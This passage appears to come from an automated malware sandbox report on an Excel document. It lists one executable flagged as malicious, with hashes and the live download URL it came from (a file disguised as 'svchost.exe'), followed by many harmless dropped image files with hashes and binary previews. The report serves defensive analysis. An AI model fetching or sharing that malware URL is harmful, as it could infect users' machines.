SSDEEP:	6144:zvEN2U+T6i5LirrllHy4HUcMQY6ZOaoi7ru0qFkBYDoogRI30z0noojfIVAdayb1:zENN+T5xYrllrU7QY65oiHuhGYDoogR0
MD5:	AD0C93B574BB947CFF15483EDA82811E
SHA1:	AD379C5A86BF646C4A079E737A364AB352107E5B
SHA-256:	BCAAC39113BD17158FE86A77328F97E9C3FA14860C9C4449A8AE0768C85243F4
SHA-512:	B31231362967089A28F24F84DFD185FDB9E2FC940EABD112BEFF03968993F9D7A820ADC1DB83A6775A3473C8FF2FAD8D067C7CA16B4A7E7C57337450BEDFC109
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
IE Cache URL:	http://stdyworkfinetraingst.dns.army/findoc/svchost.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1m..P...P...P..zL...P...O...P...O...P..Rich.P..........PE..L......M.....................0......p6............@............................................................................(...........................................................................(... ....................................text...(........................... ..`.data...t...........................@....rsrc...............................@..@$..G............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1507558.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	79394
Entropy (8bit):	7.864111100215953
Encrypted:	false
SSDEEP:	1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
MD5:	16925690E9B366EA60B610F517789AF1
SHA1:	9F3FE15AE44644F9ED8C2CA668B7020DF726426B
SHA-256:	C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
SHA-512:	AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
Malicious:	false
Preview:	.PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..MA..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z._....\|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}\|.._...>r.v~..G..)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..\|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\20BD94C.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 992 x 192, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	10715
Entropy (8bit):	7.414910193109876
Encrypted:	false
SSDEEP:	192:o98wfjpHmBG5X18nbtppfc3yX1cbzIvwjBYlE7KmnmF2888888u:SNGBgX+hpp0ClcHIvqYWnmFL
MD5:	FE450E7017E0F21A25701C4ABC68021B
SHA1:	06090A749D7077371AFBB5DC698C60FE861B676E
SHA-256:	B3A9530ADB5B09DCC14E71AD9AF5421BB2F0D95CEB93E41A2C053B77E48C7FCB
SHA-512:	815A8784FCA30B9F882CB460DB9B47919B13D8C32673BEA14CDB63E70424917B02E6F220E55E3710C7E97EAE15EBA7968936A585D235947AA7124E5042BEA577
Malicious:	false
Preview:	.PNG........IHDR..............c......sBIT....\|.d.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>..);IDATx^....,G.7...@..$.....=........wwwwww....I.._....3wV.....S..w..........w[[R#. @....... @....[&........O?.R..e........ @........+.......A....... @......-...?.....O....... @..........f@....... @......- ._..... @....... @.@.....MS @....... @......../ZX.... @....... @ .F....... @....... ...S....... @...........\|.-@... @....... @`)...0+....... @....... ..{.P..... @.......X..E.w...l... @....... @.....\.J...G.... @....... @.......LA_8.... @....... @`........co..O....... @..........-._<.... @....... @`...;.......?..... @......,^.....\|..J @....... @..............?..... @......,^..O}..\|..J @....... @......`......... @....... @.......i...gV...... @.......]...<..\|.@... @....... @`..G."V._.... @....... @....^../............ @......!..o.L...he. @....... @...S...... @....... ........A....... @.............. @........b...ydS.j........ @......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\316FFEB7.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 845 x 90, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	5255
Entropy (8bit):	7.7033322152977854
Encrypted:	false
SSDEEP:	96:4rBo9ybdRjcFQsS5alzTAmrMJioI5jyqkGEjpYIIhz+LoSxcaATr4gQWRVJ2gIJ:P4hJC05EUsMAoayqk3j2zGmTEsXUf
MD5:	908E971B305512FDE48D699925B413C5
SHA1:	0B7BB3D42EB8FCD15351E50129EF82CF900A0DD3
SHA-256:	06B502E129E8A935EBB94DB25CBF602FF57CC2E661EB780D1902DEBF1B37C02B
SHA-512:	A69787992FD285D0AA1029986379E0A1EE78C4C676FCF9B17CA79DAC0DD382EFCCCA87717080A90965B94942EBF5BE55C8A9D55D4A741CBBD8D18E2E972D110E
Malicious:	false
Preview:	.PNG........IHDR...M...Z.....d8......pHYs...t...t..f.x...9IDATx^..u......\O.I3S.G...\$....9:o"Q$.Q.3s...............X4.......&.....`.......,.....`.E.......h.......M....0........X4.......&.....`.......,....v......;.\.}.......?...>gm..1.....o....e.so~_`...-=..m.....}G<._x.]=.7...7.c?.....G.M..>...7>...B.<X..MW.F/.wq.ES.Q.q..b......}...q.gr...8..x...u..5....y.....s\|.k`}.\9.c..h..^.h....%._.......!.....bGg...q.].+...?3.G..................e.......;.W.nrW.......F'...~.<q..m......=....q.....Z..ys....o/..K.M.o.^\|.<.a...W...........3szt...=..H.......&.Y...]......H../...$.u...c.......xy...y`.{........?W....;..~.U..W..~.....h..^.h./....>0..P..u/l....Ym....P/...[&yY}Z.....:w.vr....xY.o..G..<.x..8.7.}..X.5.o.\.8..M....U.v.......1.u.v..V..9/..=......3..\.N.B\.....m..X.?...G\|..u...M._....-.Km..s-.Xe....:.Y....\.....9'.z......3^..!.......+.A.>^w.J.R_...6&1M.....slm.....gA..t'........s.?...v.....6.y^....Q.a.s.Cn.:.k2I../.".?....N.w....?...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4FB5DC01.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	3199944
Entropy (8bit):	1.0723286533222698
Encrypted:	false
SSDEEP:	6144:5FPAuIU4U9tVvfJHGCOd7FPAuIU4U9tVvfJHGCOd2:5mIvhGJd7mIvhGJd2
MD5:	6CFA3170A68147326768DE26F5E88F3C
SHA1:	5ABCF9E540CFE7E9F1BB50F43FB139722402D141
SHA-256:	5EC13FDB116FAD2A722159AC55F98A857E0925759BCAEB75AC83FCCBF7C3E8C2
SHA-512:	5796C7D980E914485DD390F5EE14196EE89CCD7F6F237D4CA7AA88EC9158196E85FD7D5AC2990D9BA3DCCC55F63A8598F47B13020331F54134E931EF018C2A8B
Malicious:	false
Preview:	....l................................H.. EMF......0.....................V...........................fZ..U"..F...ti..hi..GDIC........z.@m....Pi.........4.....4...........................................4..A. ...................(....................h................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5BA27D26.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 845 x 90, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	5255
Entropy (8bit):	7.7033322152977854
Encrypted:	false
SSDEEP:	96:4rBo9ybdRjcFQsS5alzTAmrMJioI5jyqkGEjpYIIhz+LoSxcaATr4gQWRVJ2gIJ:P4hJC05EUsMAoayqk3j2zGmTEsXUf
MD5:	908E971B305512FDE48D699925B413C5
SHA1:	0B7BB3D42EB8FCD15351E50129EF82CF900A0DD3
SHA-256:	06B502E129E8A935EBB94DB25CBF602FF57CC2E661EB780D1902DEBF1B37C02B
SHA-512:	A69787992FD285D0AA1029986379E0A1EE78C4C676FCF9B17CA79DAC0DD382EFCCCA87717080A90965B94942EBF5BE55C8A9D55D4A741CBBD8D18E2E972D110E
Malicious:	false
Preview:	.PNG........IHDR...M...Z.....d8......pHYs...t...t..f.x...9IDATx^..u......\O.I3S.G...\$....9:o"Q$.Q.3s...............X4.......&.....`.......,.....`.E.......h.......M....0........X4.......&.....`.......,....v......;.\.}.......?...>gm..1.....o....e.so~_`...-=..m.....}G<._x.]=.7...7.c?.....G.M..>...7>...B.<X..MW.F/.wq.ES.Q.q..b......}...q.gr...8..x...u..5....y.....s\|.k`}.\9.c..h..^.h....%._.......!.....bGg...q.].+...?3.G..................e.......;.W.nrW.......F'...~.<q..m......=....q.....Z..ys....o/..K.M.o.^\|.<.a...W...........3szt...=..H.......&.Y...]......H../...$.u...c.......xy...y`.{........?W....;..~.U..W..~.....h..^.h./....>0..P..u/l....Ym....P/...[&yY}Z.....:w.vr....xY.o..G..<.x..8.7.}..X.5.o.\.8..M....U.v.......1.u.v..V..9/..=......3..\.N.B\.....m..X.?...G\|..u...M._....-.Km..s-.Xe....:.Y....\.....9'.z......3^..!.......+.A.>^w.J.R_...6&1M.....slm.....gA..t'........s.?...v.....6.y^....Q.a.s.Cn.:.k2I../.".?....N.w....?...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\68E65BAB.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	79394
Entropy (8bit):	7.864111100215953
Encrypted:	false
SSDEEP:	1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
MD5:	16925690E9B366EA60B610F517789AF1
SHA1:	9F3FE15AE44644F9ED8C2CA668B7020DF726426B
SHA-256:	C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
SHA-512:	AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
Malicious:	false
Preview:	.PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..MA..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z._....\|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}\|.._...>r.v~..G..)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..\|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6F9E15D5.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 620 x 392, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	27038
Entropy (8bit):	7.914822491740465
Encrypted:	false
SSDEEP:	768:/pRWSqW77zrixHsfTsJJ5tcvvuyKuVMiwfYz8TXP:vWSzfTc2UuVQyIf
MD5:	B8C84DC628D9E1ACE3B815C0E2CE05AD
SHA1:	D9632A4C35667880A7A5313FB430A3961E29F4C1
SHA-256:	8F4F370BE6C81F2643C00EEC2BF9B6D3AD1FF68E66392741B6DD125163A61958
SHA-512:	BD5A5675106DD16DDD6545555675FB7E2C93244E1B6902E94D95418AF0831911D59BE11991719F0144ABB5E280F1A5C2F9B6340F7D21405ECA2763C81B0DE865
Malicious:	false
Preview:	.PNG........IHDR...l.........s.+{....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....pHYs...%...%.IR$...i.IDATx....p[w..y..................3..=.==.m9.r...s.(.....`.9....0.`.I.s y..H.l.n.m......"<........g........!...............\|9...kkkj..n.#.....!))...kvvV.. .........\......G.Q.....w......22.ED........S.N......D....!.........L...."...........C,..".........Wr.\|eeE(..\|...,//..$.#......G?:~.8.....s.UX,.......j.nnn...w~....666.u....~^D....>}Z ..D..()<Y>......h4z<..'9...^O.k6.I.H..?GWW.Ilx......uttH.Rr.$.$......gg.......(..<.H....S.^}..7C.x.^z)++..t............900@.........\|...f6....F..j5.Mv;y..Y-....b.....b....Mf.y..H.0.mv..j.....>..Y.....N.III...8s.........D.........k[YY!...#j5..f.V..n....e2hggfT:..u..t.s.J.zF<N~..V.......\....[......k.r2...J*...h.....x@.{....YRMR.`0........9..r....mmm..f{{{~~............h3....yE.y..#0...LD.N.7.......U...Y..}.g.^<...........?v...cqt...r.<...gn$.]^...S.......<+Y%.Vw.3!..f...6265.....h.X.6+...?

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\956F0579.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	79600
Entropy (8bit):	3.0839477237530146
Encrypted:	false
SSDEEP:	768:HtMYFp6RhhpkLOakqZyROkC35SzgBUWbDKLfgbXPJDbx3OmBYixJIyl4NS8QpKHg:NMg5LO9tQ5SxqBvjYUJIymS8QqavllC6
MD5:	F4D3F89855B71092F8330838F6A98977
SHA1:	E202F0B1F26B61E92948891387AFD72B0B3F2987
SHA-256:	E18EEAA2FA661560466E828BECF937E59C62A358DA0D2485BC0329A7CEBCDF4F
SHA-512:	AB0A8A50311FCE57C651C329D8A02804CB71E2222F92B3F49348B71979B2CCC13EF529CCFE88EE69790A21D4D8740F9FE46A2E06F0033AE5F0810F89224D6794
Malicious:	false
Preview:	.................8...............w...5.. EMF.....6..........M...l........'..}3.......................K...A..I.n.k.s.c.a.p.e. .0...9.2...2. .(.5.c.3.e.8.0.d.,. .2.0.1.7.-.0.8.-.0.6.)...f.6.d.1.9.6.7.d.2.f.3.1.f.a.8.8.b.1.e.b.9.e.9.f.d.4.1.e.e.4.b.e...e.m.f.....................$...$......?...........?............F...,... ...Screen=10205x13181px, 216x279mm.F...4...&...Drawing=1158.6x510.6px, 306.6x135.1mm...............................................................'.......................%...........%...........;...................N...6...............6.......A.......6........8......6........8..N...6........8......6.......A.......6...............=...............2.......6.......G.......6.......b.......6.......l...&...6.......g...L...6.......T...o...6.......3.......6...............6...............6...............6...............6...............6.......a.......6.......B.......6.......4.......6...........{...6...........X...6...........2...6...............6...............6.......3.......6...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9DD37EEF.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 992 x 192, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	10715
Entropy (8bit):	7.414910193109876
Encrypted:	false
SSDEEP:	192:o98wfjpHmBG5X18nbtppfc3yX1cbzIvwjBYlE7KmnmF2888888u:SNGBgX+hpp0ClcHIvqYWnmFL
MD5:	FE450E7017E0F21A25701C4ABC68021B
SHA1:	06090A749D7077371AFBB5DC698C60FE861B676E
SHA-256:	B3A9530ADB5B09DCC14E71AD9AF5421BB2F0D95CEB93E41A2C053B77E48C7FCB
SHA-512:	815A8784FCA30B9F882CB460DB9B47919B13D8C32673BEA14CDB63E70424917B02E6F220E55E3710C7E97EAE15EBA7968936A585D235947AA7124E5042BEA577
Malicious:	false
Preview:	.PNG........IHDR..............c......sBIT....\|.d.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>..);IDATx^....,G.7...@..$.....=........wwwwww....I.._....3wV.....S..w..........w[[R#. @....... @....[&........O?.R..e........ @........+.......A....... @......-...?.....O....... @..........f@....... @......- ._..... @....... @.@.....MS @....... @......../ZX.... @....... @ .F....... @....... ...S....... @...........\|.-@... @....... @`)...0+....... @....... ..{.P..... @.......X..E.w...l... @....... @.....\.J...G.... @....... @.......LA_8.... @....... @`........co..O....... @..........-._<.... @....... @`...;.......?..... @......,^.....\|..J @....... @..............?..... @......,^..O}..\|..J @....... @......`......... @....... @.......i...gV...... @.......]...<..\|.@... @....... @`..G."V._.... @....... @....^../............ @......!..o.L...he. @....... @...S...... @....... ........A....... @.............. @........b...ydS.j........ @......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A96033F3.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1366 x 430, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	25462
Entropy (8bit):	7.622041762642873
Encrypted:	false
SSDEEP:	384:eakw8WG9dWA+f4a39DtJgfkGPp1+BmaIffMvPwws:1G9dCr39DtJgfbL+EaIffM3wF
MD5:	F7F5DE01E16458A3F977A496176F873A
SHA1:	199D548F855A1D4E6B324CDF05DBCB7626A630C1
SHA-256:	FA00CBB2CFDC6F9EBAC5AD7D923199C891D1CEA20EFFA6C888D0FE384B5E2A9D
SHA-512:	68FCC8DF7AB1DC1C242A10B70DABB08A754C3CFABA36BAF5781EA3B754218EF63F14C6B40AE8D4B79CCA9647918E193246146950768B58CE71FD543720F224DE
Malicious:	false
Preview:	.PNG........IHDR...V............"....pHYs..........+......tIME.....!..+......tEXtAuthor....H....tEXtDescription...!#....tEXtCopyright....:....tEXtCreation time.5.......tEXtSoftware.]p.:....tEXtDisclaimer.........tEXtWarning........tEXtSource.........tEXtComment........tEXtTitle....'..bAIDATx....w$g.................3;.;.....g...04..si`..i0.`.......cl...U.)..ra..,[..e.e.....K.\.4.nz.~K.+......2S....\|.N(22..OD>..s.m.w...B.!..B.!...6.@.!..B.!.`..!..B.!.... ..B.!..B....B.!..B.!X.B.!..B.!.`..!..B.!.... ..B.!..B....B.!..B.!X.B.!..B.!..@.!..B.!..,..8^[...o....}6>......?....?=.._{....K...+>./>.z.L.!..B..S.r=9>.x@^...\ufy.iW../m....m6......y.....?../..;%._..?...O..........!..B.!z.m.6[..t...T......5.......K...#O..x....B.}..a.DD.......S&.[..B.!..z.................-....=...;._....]...=.........;../.k.....F.!:./......SX..W.u.w.1q..i......12....g^8ZA.)6n.k...z8..x..}_I.......6hW.h...B..n.n..e-.f+7.d.f....[....hf.d......N...s.[R....k....'n4B...\|/.W.b.....y.r.....4....v

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\ADA7AC24.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
Category:	dropped
Size (bytes):	8815
Entropy (8bit):	7.944898651451431
Encrypted:	false
SSDEEP:	192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
MD5:	F06432656347B7042C803FE58F4043E1
SHA1:	4BD52B10B24EADECA4B227969170C1D06626A639
SHA-256:	409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
SHA-512:	358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
Malicious:	false
Preview:	......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T..K..\|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B9A50DD.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
Category:	dropped
Size (bytes):	8815
Entropy (8bit):	7.944898651451431
Encrypted:	false
SSDEEP:	192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
MD5:	F06432656347B7042C803FE58F4043E1
SHA1:	4BD52B10B24EADECA4B227969170C1D06626A639
SHA-256:	409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
SHA-512:	358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
Malicious:	false
Preview:	......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T..K..\|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C986F9D2.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1366 x 430, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	25462
Entropy (8bit):	7.622041762642873
Encrypted:	false
SSDEEP:	384:eakw8WG9dWA+f4a39DtJgfkGPp1+BmaIffMvPwws:1G9dCr39DtJgfbL+EaIffM3wF
MD5:	F7F5DE01E16458A3F977A496176F873A
SHA1:	199D548F855A1D4E6B324CDF05DBCB7626A630C1
SHA-256:	FA00CBB2CFDC6F9EBAC5AD7D923199C891D1CEA20EFFA6C888D0FE384B5E2A9D
SHA-512:	68FCC8DF7AB1DC1C242A10B70DABB08A754C3CFABA36BAF5781EA3B754218EF63F14C6B40AE8D4B79CCA9647918E193246146950768B58CE71FD543720F224DE
Malicious:	false
Preview:	.PNG........IHDR...V............"....pHYs..........+......tIME.....!..+......tEXtAuthor....H....tEXtDescription...!#....tEXtCopyright....:....tEXtCreation time.5.......tEXtSoftware.]p.:....tEXtDisclaimer.........tEXtWarning........tEXtSource.........tEXtComment........tEXtTitle....'..bAIDATx....w$g.................3;.;.....g...04..si`..i0.`.......cl...U.)..ra..,[..e.e.....K.\.4.nz.~K.+......2S....\|.N(22..OD>..s.m.w...B.!..B.!...6.@.!..B.!.`..!..B.!.... ..B.!..B....B.!..B.!X.B.!..B.!.`..!..B.!.... ..B.!..B....B.!..B.!X.B.!..B.!..@.!..B.!..,..8^[...o....}6>......?....?=.._{....K...+>./>.z.L.!..B..S.r=9>.x@^...\ufy.iW../m....m6......y.....?../..;%._..?...O..........!..B.!z.m.6[..t...T......5.......K...#O..x....B.}..a.DD.......S&.[..B.!..z.................-....=...;._....]...=.........;../.k.....F.!:./......SX..W.u.w.1q..i......12....g^8ZA.)6n.k...z8..x..}_I.......6hW.h...B..n.n..e-.f+7.d.f....[....hf.d......N...s.[R....k....'n4B...\|/.W.b.....y.r.....4....v

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F8A3293A.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 620 x 392, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	27038
Entropy (8bit):	7.914822491740465
Encrypted:	false
SSDEEP:	768:/pRWSqW77zrixHsfTsJJ5tcvvuyKuVMiwfYz8TXP:vWSzfTc2UuVQyIf
MD5:	B8C84DC628D9E1ACE3B815C0E2CE05AD
SHA1:	D9632A4C35667880A7A5313FB430A3961E29F4C1
SHA-256:	8F4F370BE6C81F2643C00EEC2BF9B6D3AD1FF68E66392741B6DD125163A61958
SHA-512:	BD5A5675106DD16DDD6545555675FB7E2C93244E1B6902E94D95418AF0831911D59BE11991719F0144ABB5E280F1A5C2F9B6340F7D21405ECA2763C81B0DE865
Malicious:	false
Preview:	.PNG........IHDR...l.........s.+{....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....pHYs...%...%.IR$...i.IDATx....p[w..y..................3..=.==.m9.r...s.(.....`.9....0.`.I.s y..H.l.n.m......"<........g........!...............\|9...kkkj..n.#.....!))...kvvV.. .........\......G.Q.....w......22.ED........S.N......D....!.........L...."...........C,..".........Wr.\|eeE(..\|...,//..$.#......G?:~.8.....s.UX,.......j.nnn...w~....666.u....~^D....>}Z ..D..()<Y>......h4z<..'9...^O.k6.I.H..?GWW.Ilx......uttH.Rr.$.$......gg.......(..<.H....S.^}..7C.x.^z)++..t............900@.........\|...f6....F..j5.Mv;y..Y-....b.....b....Mf.y..H.0.mv..j.....>..Y.....N.III...8s.........D.........k[YY!...#j5..f.V..n....e2hggfT:..u..t.s.J.zF<N~..V.......\....[......k.r2...J*...h.....x@.{....YRMR.`0........9..r....mmm..f{{{~~............h3....yE.y..#0...LD.N.7.......U...Y..}.g.^<...........?v...cqt...r.<...gn$.]^...S.......<+Y%.Vw.3!..f...6265.....h.X.6+...?

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FDFD920E.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	79600
Entropy (8bit):	3.0839477237530146
Encrypted:	false
SSDEEP:	768:HtMYFp6RhhpkLOakqZyROkC35SzgBUWbDKLfgbXPJDbx3OmBYixJIyl4NS8QpKHg:NMg5LO9tQ5SxqBvjYUJIymS8QqavllC6
MD5:	F4D3F89855B71092F8330838F6A98977
SHA1:	E202F0B1F26B61E92948891387AFD72B0B3F2987
SHA-256:	E18EEAA2FA661560466E828BECF937E59C62A358DA0D2485BC0329A7CEBCDF4F
SHA-512:	AB0A8A50311FCE57C651C329D8A02804CB71E2222F92B3F49348B71979B2CCC13EF529CCFE88EE69790A21D4D8740F9FE46A2E06F0033AE5F0810F89224D6794
Malicious:	false
Preview:	.................8...............w...5.. EMF.....6..........M...l........'..}3.......................K...A..I.n.k.s.c.a.p.e. .0...9.2...2. .(.5.c.3.e.8.0.d.,. .2.0.1.7.-.0.8.-.0.6.)...f.6.d.1.9.6.7.d.2.f.3.1.f.a.8.8.b.1.e.b.9.e.9.f.d.4.1.e.e.4.b.e...e.m.f.....................$...$......?...........?............F...,... ...Screen=10205x13181px, 216x279mm.F...4...&...Drawing=1158.6x510.6px, 306.6x135.1mm...............................................................'.......................%...........%...........;...................N...6...............6.......A.......6........8......6........8..N...6........8......6.......A.......6...............=...............2.......6.......G.......6.......b.......6.......l...&...6.......g...L...6.......T...o...6.......3.......6...............6...............6...............6...............6...............6.......a.......6.......B.......6.......4.......6...........{...6...........X...6...........2...6...............6...............6.......3.......6...

